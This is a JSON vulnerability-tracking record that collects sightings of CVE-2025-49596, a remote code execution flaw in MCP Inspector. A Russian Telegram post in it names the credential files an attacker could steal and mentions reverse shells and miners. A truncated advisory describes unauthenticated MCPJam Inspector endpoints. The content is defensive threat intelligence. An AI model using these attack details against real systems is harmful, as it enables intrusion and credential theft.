{"vulnerability": "CVE-2025-49596", "sightings": [{"uuid": "de2ce4a4-8316-4967-86ee-6b19066b937d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/innovatopia.bsky.social/post/3lsxu6h4v5k2v", "content": "", "creation_timestamp": "2025-07-02T09:03:34.417796Z"}, {"uuid": "8c2cb329-7b7e-449e-9eec-4420cf96a8f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/r-netsec-bot.bsky.social/post/3lswxf3wi6t2s", "content": "", "creation_timestamp": "2025-07-02T00:28:14.929877Z"}, {"uuid": "3feae0dc-33a7-4344-aa72-72e73a19999d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/r-netsec.bsky.social/post/3lswyu4pt4t23", "content": "", "creation_timestamp": "2025-07-02T00:54:32.298842Z"}, {"uuid": "0ec708a9-f6e9-4bc8-99f9-7ec056f0426f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://thehackernews.com/2025/07/critical-vulnerability-in-anthropics.html", "content": "", "creation_timestamp": "2025-07-01T16:03:00.000000Z"}, {"uuid": "fed6ad74-aad7-4aba-aebd-05b369564f06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-e3916d62-a1d16dfcef6f8287", "content": "", "creation_timestamp": "2025-07-07T19:27:14.617843Z"}, {"uuid": "94e165de-4614-4c6e-be97-ce08797ccd91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/matricedigitale.bsky.social/post/3lsydsli2li2x", "content": "", "creation_timestamp": "2025-07-02T13:43:13.143899Z"}, {"uuid": "3fe192b3-9604-4607-a44b-d71a33126636", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-49596", "type": "seen", "source": "https://bsky.app/profile/mattreduce.com/post/3ltkhceqxhc24", "content": "", "creation_timestamp": "2025-07-09T18:33:39.794865Z"}, {"uuid": "0674fe03-b1d7-455c-ae7b-9af63c194000", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://infosec.exchange/users/edwardk/statuses/114825404956929995", "content": "", "creation_timestamp": "2025-07-09T21:30:33.653578Z"}, {"uuid": "db7f6d94-a55d-4646-9c5b-fa0a7a6240fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lrrdo2ts332n", "content": "", "creation_timestamp": "2025-06-17T01:26:51.169632Z"}, {"uuid": "b6fd0f2f-eb8e-4f21-9631-5bc1faad5a31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://threatintel.cc/2025/07/09/serious-flaws-patched-in-model.html", "content": "", "creation_timestamp": "2025-07-09T19:30:45.000000Z"}, {"uuid": "58c94d16-a65f-44b3-9d49-d9cf7ff893fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lsuu5itenq2k", "content": "", "creation_timestamp": "2025-07-01T04:24:58.933184Z"}, {"uuid": "41753d1f-0394-4647-89b5-1df9fc61e1a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/thedailytechfeed.com/post/3lsynrj3q3c2e", "content": "", "creation_timestamp": "2025-07-02T16:41:41.201750Z"}, {"uuid": "e5e774e3-d313-4b6c-a3a1-03ae51e5a0a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/ashishjsharda.bsky.social/post/3ltlauocqak2c", "content": "", "creation_timestamp": "2025-07-10T02:11:19.817510Z"}, {"uuid": "56142a3c-eb48-4558-9bb9-263b607c1900", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/ashishjsharda.bsky.social/post/3ltlaurju2c2c", "content": "", "creation_timestamp": "2025-07-10T02:11:20.372994Z"}, {"uuid": "329b94e2-2bd8-41f0-b633-ac1b4f1bee53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/eyalestrin.bsky.social/post/3lt2fke4dhd2g", "content": "", "creation_timestamp": "2025-07-03T09:19:42.651211Z"}, {"uuid": "8bbd28f4-cea3-468e-a78e-88b91fecabe2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3lu2bmzeoiu24", "content": "", "creation_timestamp": "2025-07-16T01:34:49.011846Z"}, {"uuid": "15285191-de33-4fd0-bf27-01e27b651938", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/r-blueteamsec.bsky.social/post/3lty562m4fs25", "content": "", "creation_timestamp": "2025-07-15T05:09:32.003816Z"}, {"uuid": "8d02aa88-8276-4762-bfc9-d2128676d83e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/themultiverse.bsky.social/post/3lt2hlxtzej2v", "content": "", "creation_timestamp": "2025-07-03T09:56:24.516682Z"}, {"uuid": "423acd17-7d45-493d-b7c5-47a366d9b695", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/r-blueteamsec.bsky.social/post/3lswi3orf5b2x", "content": "", "creation_timestamp": "2025-07-01T19:54:32.634776Z"}, {"uuid": "840de666-a90c-4bff-ade1-106eea81105c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://gist.github.com/Darkcrai86/8fa95e3e48f12d9a6bbed19c3a0503c9", "content": "", "creation_timestamp": "2025-10-09T07:14:54.000000Z"}, {"uuid": "ce6b71b0-3a9d-4a69-8117-d1d847ddb4ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/bitnewsbot.bsky.social/post/3lswmtxngfk2i", "content": "", "creation_timestamp": "2025-07-01T21:19:42.047076Z"}, {"uuid": "516b5777-fb73-4173-befc-becde74ba8c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lrjelyrs452q", "content": "", "creation_timestamp": "2025-06-13T21:22:16.781834Z"}, {"uuid": "529865fa-d94a-49e2-b0f5-523711ed06be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/bytetrending.bsky.social/post/3lzkdwggo642x", "content": "", "creation_timestamp": "2025-09-24T02:04:25.596441Z"}, {"uuid": "b5391c2a-a335-4046-82ad-4a24e6379966", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-49596", "type": "seen", "source": "https://bsky.app/profile/docker.com/post/3lzjajwkw7s22", "content": "", "creation_timestamp": "2025-09-23T15:31:06.256075Z"}, {"uuid": "0fb5771b-7e5d-4661-a4e6-878b41cb7254", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lyvpcwgsyi25", "content": "", "creation_timestamp": "2025-09-15T21:02:24.586473Z"}, {"uuid": "475114c8-f749-4e77-8ad0-9646b1efbdcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/techjacksolutions.bsky.social/post/3m2kpotin3w2x", "content": "", "creation_timestamp": "2025-10-06T23:00:07.894602Z"}, {"uuid": "8bd1714f-3812-421d-a167-c9eaee70366a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://gist.github.com/seansilva-adam-bot/a1602e2414da2d1f0be6f02fc94a13d6", "content": "", "creation_timestamp": "2026-02-05T07:03:04.000000Z"}, {"uuid": "25694aea-4943-4587-91dd-6cd3852f5d5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://gist.github.com/curphey/4de77ee29a83eda55e07bf1df9116386", "content": "", "creation_timestamp": "2026-01-30T08:50:31.000000Z"}, {"uuid": "be73d089-59f7-46a8-8a17-7f0aa9060737", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://gist.github.com/beejak/235d9793985eef4870d4d4fe221cc6fe", "content": "", "creation_timestamp": "2026-04-28T05:20:25.000000Z"}, {"uuid": "a1902af4-66ae-4a98-9a73-be927b3d6bf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://gist.github.com/dipandhali2021/f4753824c87cbbc5ff3e94d2c9d3e54f", "content": "", "creation_timestamp": "2026-03-28T13:22:25.000000Z"}, {"uuid": "3593dbd3-0ccc-4635-a513-a857f1bf2b57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "published-proof-of-concept", "source": "Telegram/YLjaHgOWqHy_GE2pMNrZj7K_RcmqTuBmFaJ1673d7IeXnQg", "content": "", "creation_timestamp": "2025-06-13T21:00:48.000000Z"}, {"uuid": "0ca70b85-c587-4bca-aac4-38a067981f94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18339", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49596\n\ud83d\udd25 CVSS Score: 9.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio. Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities.\n\ud83d\udccf Published: 2025-06-13T20:11:40.453Z\n\ud83d\udccf Modified: 2025-06-13T20:11:40.453Z\n\ud83d\udd17 References:\n1. https://github.com/modelcontextprotocol/inspector/security/advisories/GHSA-7f8r-222p-6f5g\n2. https://github.com/modelcontextprotocol/inspector/commit/50df0e1ec488f3983740b4d28d2a968f12eb8979", "creation_timestamp": "2025-06-13T20:35:33.000000Z"}, {"uuid": "0db6a0d3-a185-4863-a834-815c6e09d050", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://gist.github.com/beejak/c190bcb8f8b76e8b2200faef11e807d6", "content": "", "creation_timestamp": "2026-04-28T04:41:41.000000Z"}, {"uuid": "765325fc-cdd7-408f-bf61-63a71bc4438c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/10020", "content": "Critical RCE in Anthropic MCP Inspector (CVE-2025-49596) Enables Browser-Based Exploits | Oligo Security\n\nhttps://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596", "creation_timestamp": "2025-07-02T13:24:01.000000Z"}, {"uuid": "2d4215ec-a97b-4bab-99e4-e9fcb7575731", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://t.me/GithubRedTeam/42862", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-32462 Exploit\nURL\uff1ahttps://github.com/ashiqrehan-21/MCP-Inspector-CVE-2025-49596\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-07-03T16:12:05.000000Z"}, {"uuid": "a109d0f7-f31b-495c-9da6-27716ae52e56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://t.me/poxek/5322", "content": "\ud83d\udd10 RCE \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 MCP Inspector - \u043d\u0435 \u0434\u0430\u0439\u0442\u0435 LLM \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0432\u0430\u0448\u0443 \u043c\u0430\u0448\u0438\u043d\u0443\n\n\u041d\u0435 \u0441\u0435\u043a\u0440\u0435\u0442, \u0447\u0442\u043e AI (LLM) \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0432\u043d\u0435\u0434\u0440\u044f\u0435\u0442\u0441\u044f \u0432 \u0440\u0430\u0431\u043e\u0447\u0438\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 - \u0434\u043b\u044f \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0430\u0446\u0438\u0438 \u0437\u0430\u0434\u0430\u0447, \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u043a\u043e\u0434\u0430, DevOps \u0438 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e. \u041d\u043e \u0441 \u0431\u044b\u0441\u0442\u0440\u044b\u043c\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430\u043c\u0438 \u0447\u0430\u0441\u0442\u043e \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u0442 \u0438 \u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0440\u0438\u0441\u043a.\n\ud83e\udde0 \u0415\u0441\u043b\u0438 \u0432\u044b \u0438\u043d\u0442\u0435\u0433\u0440\u0438\u0440\u0443\u0435\u0442\u0435 LLM (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, ChatGPT, Claude, Capilot \u0438 \u0442\u043f) \u0441 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438 \u0447\u0435\u0440\u0435\u0437 MCP-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b, \u0431\u0443\u0434\u044c\u0442\u0435 \u043a\u0440\u0430\u0439\u043d\u0435 \u043e\u0441\u0442\u043e\u0440\u043e\u0436\u043d\u044b \u0441 \u043e\u0442\u043b\u0430\u0434\u043e\u0447\u043d\u044b\u043c \u0432\u0435\u0431-\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u043e\u043c - MCP Inspector. \u042d\u0442\u043e \u0432\u0435\u0431-\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441, \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u043d\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 LLM \u043d\u0430 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0432 \u0432\u0430\u0448\u0435\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435: curl, python3, ls \u0438 \u0442.\u0434.\n\n\u041f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u043e\u043d \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 127.0.0.1:6274 \u0438 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0442\u043e\u043a\u0435\u043d. \u041d\u043e: \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0431\u044b\u0432\u0430\u044e\u0442, \u0447\u0442\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0430\u044f DANGEROUSLY_OMIT_AUTH=true \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044e, \u043f\u043e\u0440\u0442\u044b \u043c\u043e\u0433\u0443\u0442 \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u043e \u043e\u043a\u0430\u0437\u0430\u0442\u044c\u0441\u044f \u043f\u0440\u043e\u0431\u0440\u043e\u0448\u0435\u043d\u044b \u043d\u0430\u0440\u0443\u0436\u0443 (\u0447\u0435\u0440\u0435\u0437 Docker, nginx, ngrok \u0438 \u0434\u0440.);\n\u0412 \u0442\u0430\u043a\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043b\u044e\u0431\u043e\u0439, \u043a\u0442\u043e \u043d\u0430\u0439\u0434\u0451\u0442 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 - \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434 (RCE).\n\n\ud83c\udfaf \u0412 \u0441\u043a\u0443\u043f\u0435 \u0441 \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 CVE-2025-49596 Auth Bypass \u0438 \u0434\u0440\u0443\u0433\u0438\u043c\u0438 \u0435\u0449\u0435 \u043d\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442:\n\u0412\u044b\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0447\u0443\u0432\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b (/etc/passwd, .ssh/id_rsa, .env), \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043c\u0430\u0439\u043d\u0435\u0440 \u0438\u043b\u0438 \u0431\u044d\u043a\u0434\u043e\u0440 \u0438 \u043f\u0440\u043e\u0431\u0440\u043e\u0441\u0438\u0442\u044c \u043e\u0431\u0440\u0430\u0442\u043d\u0443\u044e \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0443 (reverse shell) \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043c\u0430\u0448\u0438\u043d\u0443 \u043a\u0430\u043a \u0442\u043e\u0447\u043a\u0443 \u0432\u0445\u043e\u0434\u0430 \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443.\n\n\ud83d\udee1\ufe0f \u041a\u0430\u043a \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f?\n1. \u041d\u0438\u043a\u043e\u0433\u0434\u0430 \u043d\u0435 \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0439\u0442\u0435 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044e (`DANGEROUSLY_OMIT_AUTH=true`) - \u0434\u0430\u0436\u0435 \u043d\u0430 \u043b\u043e\u043a\u0430\u043b\u0445\u043e\u0441\u0442\u0435.\n2. MCP Inspector \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u0442\u043e\u043b\u044c\u043a\u043e \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e, \u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e \u043c\u0435\u0440\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438.\n3. \u0423\u0431\u0435\u0434\u0438\u0442\u0435\u0441\u044c, \u0447\u0442\u043e \u043f\u043e\u0440\u0442 6274 \u043d\u0435 \u043f\u0440\u043e\u0431\u0440\u043e\u0448\u0435\u043d \u043d\u0430\u0440\u0443\u0436\u0443 (\u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043f\u0440\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 Docker).\n4. \u0418\u0437\u043e\u043b\u0438\u0440\u0443\u0439\u0442\u0435 \u0441\u0440\u0435\u0434\u0443 \u0441 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0435\u0439 \u0432 DMZ \u0431\u0435\u0437 \u043f\u0440\u044f\u043c\u044b\u0445 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u0432 \u043a \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435. \n\n\ud83e\uddca \u041c\u044b \u0432\u0441\u0435 \u0445\u043e\u0434\u0438\u043c \u043f\u043e \u0442\u043e\u043d\u043a\u043e\u043c\u0443 \u043b\u044c\u0434\u0443: \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0432\u0440\u043e\u0434\u0435 MCP \u0440\u0430\u0437\u0432\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0441\u0442\u0440\u0435\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u0438 \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u043f\u0440\u043e\u0445\u043e\u0434\u044f\u0442 \u0434\u043e\u043b\u0436\u043d\u0443\u044e \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438. \u0423\u0447\u0438\u0442\u044b\u0432\u0430\u0439\u0442\u0435 \u044d\u0442\u043e - \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043f\u0440\u0438 \u0440\u0430\u0431\u043e\u0442\u0435 \u0441 LLM, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0432\u043d\u0443\u0442\u0440\u0438 \u0432\u0430\u0448\u0435\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b.", "creation_timestamp": "2025-06-30T14:15:15.000000Z"}, {"uuid": "8d74d705-04bf-4cfd-bafc-fa5fab9308d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "published-proof-of-concept", "source": "Telegram/HMcM9813eIJOyuNo5YZNbIe038j7zzCtsVC9QJ1AyxhmRyM", "content": "", "creation_timestamp": "2025-07-04T03:00:09.000000Z"}, {"uuid": "d3efdefb-51ea-4846-872a-75db8f59c80e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://t.me/CyberBulletin/3600", "content": "\u26a1\ufe0fCritical RCE Vulnerability in Anthropic MCP Inspector - CVE-2025-49596.\n\n#CyberBulletin", "creation_timestamp": "2025-07-07T21:59:04.000000Z"}, {"uuid": "bde2145f-587e-470f-84b3-c9fadb00ee90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "published-proof-of-concept", "source": "Telegram/RwxI053Evvt9D_WU2CEPzLIpQuMsrIeDnG8Eg4nvRFYLzdw", "content": "", "creation_timestamp": "2025-07-03T21:00:04.000000Z"}, {"uuid": "64281553-2c8d-4a1e-bf9e-f39ee653678a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "Telegram/vo7yuH8LHyBXdHaE9wQLrp0tWIgPlLAwJO56KKBjpmx2jw", "content": "", "creation_timestamp": "2025-07-01T20:05:18.000000Z"}, {"uuid": "8f736bf8-0ba5-4f0b-8bdf-640f1883eda2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://gist.github.com/sandh0t/02a08b8bb92781def27062b182bc401b", "content": "\n\n### Summary\n\nMissing authentication on MCP Manager and Adapter HTTP API endpoints allows any network-accessible attacker to execute arbitrary MCP tools without authentication. When a used MCP server allows system command execution capabilities, this vulnerability could be exploited to perform Remote Code Execution (RCE).\n\nThis vulnerability is similar to [CVE-2026-23744](https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6) and [CVE-2025-49596](https://github.com/advisories/GHSA-7f8r-222p-6f5g). This vulnerability is exploitable with no user interaction and doesn't require authentication. Since MCPJam Inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request.\n\n\n### Details\n\nThe `/api/mcp/adapter-http/:serverId` and `/api/mcp/manager-http/:serverId` endpoints are explicitly excluded from authentication middleware in server/middleware/session-auth.ts (lines 45-46):\n\n```typescript\n//   